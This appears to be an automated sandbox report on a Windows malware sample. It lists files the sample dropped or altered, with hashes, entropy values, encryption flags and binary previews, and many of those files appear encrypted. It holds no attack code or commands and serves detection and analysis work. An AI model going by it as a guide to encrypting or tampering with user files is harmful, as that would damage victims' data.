                  Preview:regf...."..R^..*...x...rX>.KHP.....c........"gc.8z........k0...M.h.....E2..H...|)..SN}VI..A..Ue..O?.|..D+h.Q...-....Z.j.hE.a...P....1...*=_.Xk.V.>/L~....bw..By.....8c.......@.....2.vf..&m#n.T&.BbX.=.m.7....=l...{$...%.."..X....xd.>'.FV...v....|.tO.n9X.Jz.f.5.pP.........k.9.h.Jwk...4v....k....8.x...u0..4%...-}eBU}.Po..u...3..uv.!..z....w...|1X$..H..:..H.#Gw......=.x....5..G\"..\".X.."C..I.t...~.........'.f...._.k.m|.!6.i..Rb....o..M......0...G8....9Z.......v9...s..&A....8..Y.Id...W."VK..9../.g7b..l..{u.......Z...|.Ea.....G&....u./Z...R.,..Z.;8...7.....~Z;u"h.+^x.C..h..eS..2.....=SN.U.@..m........I..I....z.10p..E...c...B.....JN..8J..+...^..p..5U....@/.z..m.4..=.J..[.._u.....g..i'..w...>.U'.s......*...rW.l$..6..5..Fj2........!.6sn.S..IDwM.YV.R.>>......:.K...\.k..,....V.Em...Q..q..ayN.......-f...jl..#..\..:%...:..1Y........I\.P....QD{..|..L..z....!.$K..WoGuj...x...T..4...N9.K_E..yH....+...w.H.O.._."3)w.S..a....}..!p..S.....P... R....tWYG".

                  C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97748770285942
                  Encrypted:false
                  SSDEEP:192:ACKoq9uyifKswiEI119oNy56WFn2nkBeW/vQN6E9+cmhgfi8Ajh:ACKoq9LOw1k0yJFnLdhE9+beN0h
                  MD5:3A1D5EFA4B3E58A479162B11F347AFAB
                  SHA1:F43DC7A17C88C686178F89E90888F03ABA981004
                  SHA-256:DD52FF1C784205A936591AE7F5AFB7CC3BEE3BE45A22D56DE8D35B1927471EFD
                  SHA-512:6A2CED1998A862285B31CC1278153B68C93F0FD3945CEECE6B16EEA7B49A3EF3C5F4442D1ACDDEE3957BBD57FD509264030F2FC1E5836DB42CD1D2A9275C0DE4
                  Malicious:false
                  Preview:regf.w)...QNP+.~'....f.."....+.....Y.R.WB...r..*@....s.f3v..`S...=..s.]....C..}.U>.z... ......n.}]x..-n.....tm.~...4.7W.D.RX.5.V+.'.c......mBJhkZ}.I...?@[Q.S....t.^.?...gu...........tk..i.F...&..>EQ.ew5.....T&U.P9'.....G.M.O.(....9e....2...w_3.4N[.=..b..B..G-.A..!t.A.%FL.#.W..2...wk...z.......E...x......9&T....8N..........-X...Q......WL./....3~..H..i.Xl.H.f......n..>l.?.D.:7..o..t..d.@.^4..1.V..3`.f...x.....J\S...(6N.7..QJ.7R..z8.9#|.n...s.s.......]?.C-..C.d.o>..G7.fsI2.R{.-C5...6.$.....D)C\..F.^.....k.u.g..LZ...x...o.3AL..=o`....)...v.$.s;...Q.6PV?......{.qmP.n.....kb.g..*..9.|.E.8.5.7.m!e..W{K...6...L.0...]..y...v.O.]K..a..os..D..b."......K...af.]`>=...-......O.p.(...q8rI..+~Ek....Ag...-.CJ..T...R#.....*......@8.fz;....Z...D....k...7.#)......h9.....I.f...S.:.r..'.@.....hf..P..p^=...e......X...O.~..s)]....p.6....>..q~.q."..=.N..]`E..U.`r....4.P..,...`..":-QV"U ...L.i{.uy..3......A..>CX........)e..;FJ..l.7....S...4Yn....Oc.m.....

                  C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.983282538413479
                  Encrypted:false
                  SSDEEP:192:LuE96hGFLrGlB7uuKuO9ZtUV38t2YTugZLLE1WILHItjB3Lfo:yE8hflB6ASZtUB8YbqvIbIQ
                  MD5:984382374FAEA3DE046D01E8692181B6
                  SHA1:5ECF153AFF8D9F623662688AC3FE41423CD7F1EB
                  SHA-256:24FF3214E48D42D032D9A810DDF709FBA55BA4818147F7AE8A14812668860FA5
                  SHA-512:41572C3286DC9DA0CC6E9BB87E8C8D2FA363F23F9918061B0EBD464818DC98EBC43AF815220CF7A637F9B3CCE049684495052D663B2A683915BC9A30AEB9AF83
                  Malicious:false
                  Preview:regf.O.....o.....(....pT.W.D.....:..).H....|....i...?..G".9...-.[!\..1V]..F...z.i.u......x..$.{$[q.Yq~..T%,.1.C......R.;p.'.......Q..\..hm"......3/..v..p.!..2U....&..-..C....:(..)j.,kQ?_.xpy.l.....7~....%:..S....X]..Tzz+.L@v.o....,:..)..IP.|.ka...t..rX.rZ...7."...%U.$[H...C..yY....P.[...LOq..w..~.Z.@....u.c=......K...v..5.s!Q.*....n.1.r(..P.oy...)Jj...#.&;..G..C...(7...:.AH.. .2^..b..s...r.(7X.kr.j.....y.T.sv....:...g.YW...N...:........;....A..>..l.S...^..8n.C.l.._UG.....vCfPa(:-..h._.<..'...1[B[..]qp..(m...........t...+...d.....?abu.p..z.=.;....i[...w.b.hN..R.=Z.2/.5.l.J..S..!|....3.`...)..G..KB...d.TBW....w.v..*-LByt6|}.#"=..]N...$....&.x..l...gh.!1EsLW....<.c...?/.`(.....L....iu.X.Q..Q.......oI..'{k...'``.o.K............pq...{...^.F.M]...s...........^[J<2...r.0w{.m...k.z... ..3....'.|..5..Q#.^-T.".nn...J.Qi....FrU!E`..|..&;.....K#.....r........iI=...<q....@..2og.O...0i..T..TD,Qa.I...P.....{GF.....p..o.e<'8p..+.....Y'.X*.vm..c

                  C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.98036059854907
                  Encrypted:false
                  SSDEEP:192:r4rpiml5XHwaq3mVRJvOQtlDL2ax9CKFbjAthUR:r4rpia5XH7q2RFPB9CsII
                  MD5:401B52C63CCA5EAC0235BFD7D4C5AA55
                  SHA1:A5DB614B089E0FCC471ADC90AAA1DDD1EC708A11
                  SHA-256:B7C88DD2349EC433558C65C70DED8DA6F18AC55FD01F355AF30BBD4C82586CF0
                  SHA-512:788B8C9A759F1F445C60D330D532E2B9D849D50E13AFEFB52F4444C1B699016CBC2048C8D35F79CB226D88B2487E18D36842CE1E7C2D1A60C256403D27246DDE
                  Malicious:false
                  Preview:regf.:.&..'.Ly3..+4[...m..i....l.L.[-.n..f:s[............][...g.....C.....%@.g|...b.......T..9.....K.....G.x....S..Sh..........2.v.S.H.-....t.gGV^.J..S..~n&.....8......^h3c.KbX]8.:...TU.\.....C#.|F.&.................s+).-.~. 0F.m^..)(.i....F.:T......\P.b..$..>..>.f+.......k!.i...F....J...]V..D.7b`D..C.g.....Y.#.SL..<..r..P.N}.......hHa4..g.o..K.......2.wO....6<..^%,.rw..>.VBX.q.....[.eI..*g...@..f.\.....w.8.(y..k....;.JP.R...IcX@.....|^.)5......mz..r|...?.....<e..z.A...+.m.l..IN7..~..<saC_=.<.D.O..1....$....d.(..7[.........+k.G.u6s.^O+..+-@.m.......$.@.`/j.^C.uu.^......e.t.e9-.....Eu....D4Cg.Ny..2.._5......g.+..%9~O|.o...W.. .U<...h?.../0.X..*...A.gs.O..0TE..a..\[..E..da.G.l.RS......yAQX.HDA....!.Q..}...0,}....w.. N,..pB.......9..V.g.K....4.bq.sS^.....a};u..B..+..s}.e.......uS?....6..C.O....ZE..y.._.>..U&~.._....../.3.j3WFj.,...g*......}.....jiS.....~.u....#..D...*.J8,./..k.2.=.L9...[.N..8..'._...Q.I.Q.>..m.D.g.....d..T.<.N:.......R..%<..rC

                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9772255039527415
                  Encrypted:false
                  SSDEEP:192:Wy2a87eFRLz8rGhA/fK5gZYq5oyJzVAyM04ulba6BbTcxMJbZEwsml4X/Z:Wy25eFRXhhSfK5aYq5TVAyicTTtYmla
                  MD5:FB175A5768D18FB2F5B3FF7E9C43ED95
                  SHA1:D8423718BA73C072832F21EBB397C9F12A18999D
                  SHA-256:5555BA441D53DC01B126EB14CE58B5ABBAB7F625C927CF67063849EEB7A32CA9
                  SHA-512:A7ACACBD55969A714B5F38FF5D0C9301A4148423F1BA927E4753AD1554AD5E4F9F58B0F1A9857A9D61E16CE44D7BDE4325F9B63DA30AF663674433E0D9F47083
                  Malicious:false
                  Preview:regf.F...]...$mMg.Z....5.,.....o.z..0..C...-j.iI].T...ajn....o*.k..\..Is.eC./q.G.).....F....9p.~..e..T....B....D...^[.X.#......./..&.~.8.t-%...}...Ag.;O.a.?.4?...H..b.2...E...NSG.Y~..F...[Re...Nr..{..$*......fs.(...T..)_.........p'B.&1;...8...'..x...gi...._.zP..A.2w......_]..~...j.d..3p}&Xa@.#3....._RZW"`...... 8...."l..:......J...;..... ..,..B..I)+!v.8._b.T..$.2.Py.Pz...v0[...T....>.t@.Q..d$e....F...3.L.S.t2.T....h.Z..y..x.....=c.e...W.sT.|.6{...i..gj.Mv].%...P.B.`....a..S+v...U.(.....c+BX.dS.,.8w. e...zO ..d.....o.V.R^.St.N*..).6...*K.J.Po....8./..,n.................).hq..6....-..*..../.f...;...a{..9...Z..k5uw.N..`.......o..UD...:.......o..c...............$._.....QX...EH;m..S.=..q..%.&C9.6%zx._e.i.....W:.D....%o..`.X..1.k?@X.....]...c)....l.;v..[.iy.|....Q..C.B...<..$2 ..D"t..U=.. .AR3..c...T.D...~.._...}.l....N.W...U...."(........#...[..[Y..#.MfN....T..=yt.. ..gc..Ae..r..Hbr^..U.-v.1.3.$)>.w.q6BK....mY.<.J....a.?'...J.....v)s..'`

                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65870
                  Entropy (8bit):7.997824398105183
                  Encrypted:true
                  SSDEEP:1536:c4YQwjUIHkEslLON/+n46OkU0ENmME3XW7Pt1n1nQYWMrFXOf:chpjfHkba/j6VMNmME3SPdQYJXI
                  MD5:63E72D277B9D87D0400195A56007F773
                  SHA1:FB70B7FC9E5CEC12765F613DD7171E700E9E6449
                  SHA-256:D0FBE246001C2D0508E9503F2CEA08674742ECAACB72C7066F1B4ECB53797791
                  SHA-512:753A34CBAFB1E3034FFE9E5C7D9EF1180F9AF92AB028FF0E144E97F37A5731C25F25724F4ACEBA23FBB35FBCA9A42E607D51C978CF1A05E267CB264DED9314FB
                  Malicious:true
                  Preview:.....2....D......|X.8....>XR...CE.H.h......J..zc...d...Pt.x..T..p...3.K..h.K...-_`nh\rY.-..q=J.]'.....<....6.....;...Lk.6iS..Z....1.P....Yei/>..}x.*.MQ...|Df...zI.X=..Rj....5....\.#.L3.B...1...5.yB.\..MK.9(.....+.#.Nk....M..4"...H..P.0.?..8P...K.(l..c.~...........\...ka.E..@... ..p.S..u$Y...m..n..oj4....q.~(gh2r.@hT....>x.....h..4..|...f.4..z..o=R.X.l#_3.`.y...Q.....y.:......'.3m......L9Q.2M.5... &....W".l.R.....&_r,......p)Lm.'.J...O.ihb..M..)....l.h.iepW@._rA&{.Q.j......v...5......8...).(H.y?... 6.s@-......'7..5.[.-/^h.i.........@...q0E.....{...)..n......HS....TS.Ut.:.....b.A..7..4...1..u.<..t.D...Hr..Q...In...7.l.gw.u.*.E..U5K...........#.4X...W...+;..... b.I.Z..pb.....\.d........A<p......D..|.*....9.ZFo5.j*......)mi.;..G.....9...V..I.7...g..g...=..JRo....7.P...M.aP.'.W0...4.z.|(X..8....Y..C...T...[. .>..N..:g._x..{..W.ZO...l..sv;..-m...6!.....}.x...*Y...0.....zzH..hu..H.D.J#GyF..t..?.!....YSC.4....:z....X5..X...f.....U..1.[.28.u

                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65870
                  Entropy (8bit):7.997300056232838
                  Encrypted:true
                  SSDEEP:1536:gHpnvKHkGpqzFZpumwtwOHpR1iZjXv7WpNpi8WB/Xn5z9VGYbu:gJvKMwRxiZbDWc3/XnBc
                  MD5:209BCE994BB0B9569014D1A10EA3FEC4
                  SHA1:55468D0479323786E1C2C9142262DA95D2C9E11E
                  SHA-256:396BD0769F8C180B35D1334E3BB4556CEAE3EA972E0B330880892BCEB059DE85
                  SHA-512:262DBA6A8DB92EC9DAC76CFBB0A4455CA94EA90EADD7C3D2682B2166911B557E5E20EA32AE7CBE7ADDCB48D790FE24B67AAF29C7F3B166C1C6DA73654699EBD6
                  Malicious:true
                  Preview:..........A..~.\..h<.....3I.......;.Ya.b.h.[.1K.#;...l@.X.N.....:&W,<....v..A...w.k...4.7l.vu..G..5H..X9.xYN7.. ....>^.H~#..q.6..^.....^Z.y..'...CF.4...5.....iT."..A4...[..4..%d....@.m..o.4'.R..}...j..<...S>+........J.LP.d..@......5....#.....&ap.[jbJ.e.>0.b..a..8Z..X.....E..2 (......K..,....u...X.J..6..F?.W.]....\=.....D.Y.V..(S.+...+.J.'..?.=z.2....}.fr-#..h.....I.......2;../p.*...#)..r..0.z/.....|.i.3..".....w....^lnrl..`..@.=;.....9.y..'......7.)...T..`..~..0VW..].H....k....|d...0..V^.x.CEH..5....0.....d.ii..... F.,c..&..q...A@.K.yyj.y....^........c..\...UT.=...{d...D.<..P...b...g....q....x.2S........Uv..@.J.ll.....t.OY{. .$..:g.|..sy.{.Y..$fh.P.C> ..).+.v..e.....!.t.'..XeE.^V..M...3'......N=9..ML..F>.....*.....@+..t...$R..F7T....K..%..lv..../.*;.Gl...i..|...u.G.{..6K.e....&5..(.~.=Z.9!}K...wX.C}.@ ....Z.......&.@.QP...I."Bt..........e.cM.r..?..@>*H..1)Ovx.Za.'!u.O..-....Q.ae..dT...$.WW*..r.6*P....+...{........`}:A...q.

                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxStore.hxd

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:modified
                  Size (bytes):4194638
                  Entropy (8bit):1.3045451273781123
                  Encrypted:false
                  SSDEEP:3072:SyjHQnCIts9xZnZMAYH+80Owav73dta2FbJ/2ozHisIyDRqs3g6sUdEgzyQ5ZtfG:S7CIts7ZnZue2/v73/JBzLQEckz7y
                  MD5:651FC91ED969124FAB49E572E5954277
                  SHA1:F7EAF0875D98D90E1DE257071DA45A00EA7F771D
                  SHA-256:4AF86C2264D31BF9DB7BB57D11BB3B0C383F293EC45E91B9FAB4BAF92F511893
                  SHA-512:7C15389E318F7ADB3B4E07033C8B27FE1119A4DB8AC993D5D5525D99903C684A6C6251D002D1A22FC28EB6C7E84D99FF826B1820D72F54F211FABF37070053CA
                  Malicious:false
                  Preview:NostrTi.nI.H.....W...*...z".43.E..$9...B-h...^.B!..}n.(q.JfI......o.\G.Di..d.K......d...K.X.(..-.x...........rSz..0o.4.=...~L....#...I.Z.w.C..\.<......B.tR.H*.k.......'\....=)..Q].X..7s....w&3<.,....p..r..W..2n@Ou.....O...D......6...5..;..K....0.q...+$'.....X...ml...q.5.Sxz^...0*...6.m.Eh..^..J."Q#K.O..L._.8&R..Q.G"..02e.7K...LB..?oo.R......5.......*.^2.....3..]..I(.'M#.........W..<........j.5`..e...(.....i.|.=.7.Dxt..49.*..5......V..:N.U..~.....^...zo.......,6F..>..L.......AuCp.T..|a.s..I..=.....e..X.o.T*........X..V.u...c...2+.;...?...a.2.+.......=.....f...F..C8Ln..H..*K....Eb....A.z........m.}(O.3..-VWt....(@....d.....)I.......l.....:6..ch....{1..Z.|j:}.<.g......Z....R<.qN.ui.C...|.`@8-JG.dM7...<.:u.Q.f.`.P..I5)a..$.FH.4.6.N....q...L...s..'...u.1....]:.4.b..P..>.OT).Zb...r.%gG#.c!...c...{.9..C...j......["..7b.....N.\>I9../....h........X.Q.y....S..%.s.g.l.c.=e....\s..1u..p.G...\........\....Q.%:B_Y...q..6.b..\..u...m/.g..',..

                  C:\Users\user\AppData\Local\Temp\.ses

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):387
                  Entropy (8bit):7.247058388376485
                  Encrypted:false
                  SSDEEP:12:QxV5Ydm0r9xJbo1//MldZ5cLzLbU936Wcii9a:QhYdPxVoplzs3zbD
                  MD5:5EFD295B36BA6A716CADB772D2554BDB
                  SHA1:31647B40D69743EB90905BF2CAB2BCA8F1CDF5CB
                  SHA-256:32C8C46BB30BB955708724E9C87C854B910A9C36F8800E75D18753547F3C45D6
                  SHA-512:D170DAEA01C8A03A29A41B09F412EE02DC6030269BFED2A248032E2B04B74B9D5E54EE926C95D84E156197DB6A1692BF3E131CDEEC67330C1CF1B13F297FB45E
                  Malicious:false
                  Preview:16964............y.....5.......UhP28.DG............0.....~l....4..M_LMf.x.q...K.Nz_..f.Z.-."W.rE.q.`..yc..o......@[[4N...4..SW....eUim>......`............Q.\.5V..^_...fW.....`.-..^.K>&.....m..e.....'5D.......N.$kN.... ..................@1..+277..:<... .4.#Mh.n...k~qM0...y....x...P.N..lv..>i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Temp\08155A67.exe

                  Download File
                  Process:C:\Users\user\AppData\Local\Temp\HhVfIB.exe
                  File Type:ASCII text
                  Category:modified
                  Size (bytes):4
                  Entropy (8bit):1.5
                  Encrypted:false
                  SSDEEP:3:Nv:9
                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                  Malicious:false
                  Preview:foo.

                  C:\Users\user\AppData\Local\Temp\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Google Chrome extension, version 1424908803
                  Category:dropped
                  Size (bytes):1332939
                  Entropy (8bit):7.991183295594699
                  Encrypted:true
                  SSDEEP:24576:hRoMvx9HyhzVJofhWbwK1GbejcrbBdXYQHv6voyQFQRHI0oTFU8zatMxpSA6MLg:PowxI5L371GFrbBKiyGAo0EzatGaZ
                  MD5:095071F1A1DD8B588DDF87CFEAFF1ADB
                  SHA1:ED7C542A14475252C6480F31AECC21CD08793BD1
                  SHA-256:3D2C5D6080EDE1644AFA5B04D8DC5CDA382E5436BDEE1050161D81BA102101E3
                  SHA-512:8EE641698AC44A5C9D25EA05F9CC229DFDA3B8E8B18F97129D0E1E0ED6FB1519E58FE2E7ADAEA660B2F9C3F1342480827A33BD7B07F2658D77A99D32E53C3631
                  Malicious:false
                  Preview:Cr24.b.T*3:..k...I^.*..4c!.L..c.|.2L].z....P.."...w..U3..;.8.q.(.r.<...HUA.Y....l...&.i.*..J..[..$.3.D.....S.t^.J&.L.3+....... ....L.#..M.a.`..v.|...!...=E]].xM..;E..N\..L.o.>..Q.G@..X.5.Ay.Z.o.yX[..0..Ga..v..zM8y.......!.......x.y...(...V*.\k80.6q.%.d.S-.q".....z..T..`...|...&.N.{..........m)....W.W...-./...5...0l:....@k.%.VFI.oI....%..K.... .}.A.......m{.xj8L.".~...d..S.....u.N...%.c..0.w...'m`.m.?Gv....,Y......3.!....I0....l.W..Eo.}........Cp.h..f/h..6A..|-U..Y..M...$..xpKqn..`.............|....sI.....}..(...{.].]......E..0..7.S..f..5...;..nkG...$...Z.m#3iJ.....y...D......V...9..[)P.)^L.[)....J.CY,t...z&......(hT...7J...o4.-zS.8..W.(.l..\..Wm.....z..).~>a...L.PKU^S..L...g..W...j.}.$...|..,.B..J.....oO$...W ..l.I.L..|....'Is. V.Qj.}...D......^..q3...q....p@...(.0q#.zd25.)..M...Du.....y(..aP[...t:..x.8.%.......n+o5..Ph.K.k.b8....a.YO...6(.S...k4oy..P..bt..Gy#[..............L..d.. ...w6.u.....f.iE.0VS.$am..&.SB[...I..:.o.DO..vEDT..X:.k.

                  C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992142772819465
                  Encrypted:true
                  SSDEEP:768:XLlFLhgZxFwh7lF04nnhEBgk+WiLwHBP6PL:RGFYz5i6PL
                  MD5:B2AA8DC1E3E89BEBC415184E891D4303
                  SHA1:DE77034D8CF3FA65A8B74A64A21323AF93BA285C
                  SHA-256:0DD256E2DF457496A174BE55D73E877F4E5F50469B455A610B7DA32B7F248057
                  SHA-512:08B1484308286DB38F478F51F65A4780439D484A82D08F54CB27784A6E6C723CCA8D36FFC4E3265C21B5BF76D92374EF64058B7A018EBF8B69D9DAA9AA032589
                  Malicious:true
                  Preview:SQLit.c.N....[$.c..}.j.mS.W5r.r..`wdk6y..j.....I.h.....0 ._.......!..i,U+"..zA3\P.................riM.........k.~..I.....".1fd....0.....kU..x.i....Z...U9..,.1/qfq.I...m.y.K7.-..$.7......m.....,}.[.AF=..[.."O.mu.B...,xQ.%...?2..'.e.@.J/.gh8. ..E.......397.....a.w..A..z..3...?NT&.2K~|.B...v..%\..[....R&z....5HHM.".x....,9....4w.b.8$...nj.H....H.<....v....4..K'......r..?.3!$.....|#."L..&bM.w...MU.?.p-..M....R.Q}@.,7.L...Y..../\S.e..&Z)8.m.th....A..X^...c....@U.q....>5.E.8.t.'>..=.o..~.+../6z...r^#.....^vII..P..9E....d.]...F..Xkna.......Z.Zz.bi|.....]M.l.g._.`.6.#..Y..._.@...i...\.GZ..?\t..5.......D..c.........Q.'....E......)YR$....Z.r1....^..)n.z.....%.z...n.F'.*.$KY.a.-`z.m...DJp.h....VB.y.F9.W;tX...HV.H...2....jD$..?...D./............,.1........5....N...*.|.<)........H.b.u.4....l.B..I...P.Y..Q)...6!........G..q..l.........:...o1....o."...p...1......9.....}F......hj...)..U......:.....+8.l..............&`=P.,{Zv.P.s.....k.N.Q...Wz..m_]..

                  C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66542
                  Entropy (8bit):7.997481613544612
                  Encrypted:true
                  SSDEEP:1536:xR6PIsHAS8Au8FVeqOEu4zM/l0oQcQqqUWJTohohTQa8Oj:NsHAFAu8fM1fQ10ohMROj
                  MD5:A693FDFAB49D6FA793FF351060BAC679
                  SHA1:A2B5E339FE8CF09FBE3A1C28D6A0940E922EAE60
                  SHA-256:D1C1FD061F3764751CEBC248064C1B8ABBED1AD1D194140DD7FFB1F21E85F49F
                  SHA-512:95E77B3D2C26D95C3261213DE34FD54315CC5DDB98242EB2A16F8E2FCCE37EE2957F64D9FDFFCC5F45122E78D30EA7BF1C137A929F0608445A5D1ED7BD794C84
                  Malicious:true
                  Preview:1G.f..k^..n...i..n..oA.X.......2e{/.T..v\.....O.N......3.E).=x.,...x1F....4.d........./4+.q.:`.*...o.}..GC..t+..3.............V<"6b...[F..]15..@.......;.*...K.........N..yVn...Z.a(......C...R;......Ax.}m.K"....,..7D..%......V.^.s.i.......clN..TS.w.k....$4.R..{..X..:...Z,.=.r..m........%.6g.3..."...H.V^M0CJE.WM..7G..........Sj..i......`P.......c....I..AV]....'..CP....{.rpj..~.".O%.?g....&..de...+S..."Y..[..5L\x.).=pyD.1..U%..J.o.....z|...SS8..............x..en.g.W..1.Z.._..D.Z..h.~=.._+.6X5.h.B.$....CS....|dGrF..hMzO..\;m..........e.........p.W.v.MobP.`..:.'.....+....&..H..s..K...t.7.&d.....<.W...aTER\L.f.F......c....F..5.V.....@u.....6a........_IU..h........GK.....<..m.<.:...9Y..)=..........S..9Cs..@.4..t.P...Z9.L.....U<..D.2.7..W..sB.~...Qjf.....u.....g.V.c..R...^87..6_.....T.?)?z.X....r...,.:q6.)..2.|.^F.r..[.......x.....#........[...........;......Ee.qry.O...w.....O.0VLl..,.e.b..P..O..X>.6k.x...E...!/.-..~E....+.R...tw\..V..)L.

                  C:\Users\user\AppData\Local\Temp\AdobeARM.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2623
                  Entropy (8bit):7.931216273152325
                  Encrypted:false
                  SSDEEP:48:o05OvAwrHxRads/cXJzf/SGOEu8E4MqJ9f2CTqvh45yh4OF3/JjQZezTMrZoqzG6:oZAKHxR2sk5/5OEjtJ9rAh45y+YpQ8kz
                  MD5:BB2B65EF5FD02E9B6C5615FE80913D13
                  SHA1:CE036A3741DB62532C157B978EB1D05727D82CB7
                  SHA-256:2EEC159762850B264ABD89E39837B01A77F465E77EC390070257515359FEC915
                  SHA-512:0B42DAC9EE1E957BBD0EED90154E3957827F7C62934DC99A857D1E9C8268CF9D30E1EB978E642B001A9BF6C9E371A09C2C3B66C0ACB768198EE47C8F0A1DD25B
                  Malicious:false
                  Preview:[2023....TP....]....K..>.z.nx.D.`..{1.5.....d....>...R.f.<M)..x.hG/.*R.d.~...........@...S......j\R.,..V.,..[d...Xi.BjG.F^l..p)...W_....{...(.G...@.0Nn......dK...oD.?.......y}.9..i.....C;.@...R......n<..&....C.e2.Q.DP..4.7.5..g<.\.2...Q.\......3.w..Q..M...s..K_)q]Z..2.9.R#.1cc.D3........+.kg.|{......"..Z.1K.1.m..V.X...5@1.....M..I...Rlt._.`...!..V..5;'.D.$i....\.s.F....dP8.'...T...+...-...n.aK.".-.B....."d.%}}.~...;.J-#K+R....n<t.../.F..q...d..} ..R\.[..G....q.,. u.^.=....'...3.A.8.5..m.v.T.}..$[H..X...&..............%..'./noQ...N..I..n....j...~n.=...).F..P..}>*.../...................y......B`.h..XZ/6HF@.V.U...f..?....X...U.,e...]..[/..T.~.v.W..'.3.nueI1..Op{a.,...M'c..g...m].s...h.#.G.....o..bHZE1.c..........o. _.....)C.\.}.....G...e...;L.L.i..g.....9ry<I...2.#.U.-..`-......Zwe.3!......'....gU@...D.T$LZ./1D73..DO..T.x....e...#..v..Q...32T'.H..=6...+D\?...O.B(..H.....Y.m5....a.3.'.K..?.......t.'...."...)...\>.....>N3..K...!.6.h.dO..]C.

                  C:\Users\user\AppData\Local\Temp\user-PC-20231005-0843.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):39008
                  Entropy (8bit):7.99510621789545
                  Encrypted:true
                  SSDEEP:768:Ui15TW6B1ZJ9x/URNc8aXgWStNFkF04Sg1X4FG4cu3e0ubbFoZjwlO:Ui7tJG+8nWStNFJNg14FejbbFoZjws
                  MD5:865B8621E18F4991B4CBE723F51AAEC6
                  SHA1:27E96FEBC4BDC2C2BCB4F3DE00DF963875D89EE4
                  SHA-256:14BEE223658251FE3C0CFB37D068EA95DB05CB70E44418F6FEF4FEFC419BB571
                  SHA-512:0F196EE7E78BBA5CA07D702CBB07F3A9C18800000416305DA8547DC0964B04BD49E999D25E5A5E3FE93801C663F5AAAE2D0C67B5DC8277AF14BF3DE04DF3B815
                  Malicious:true
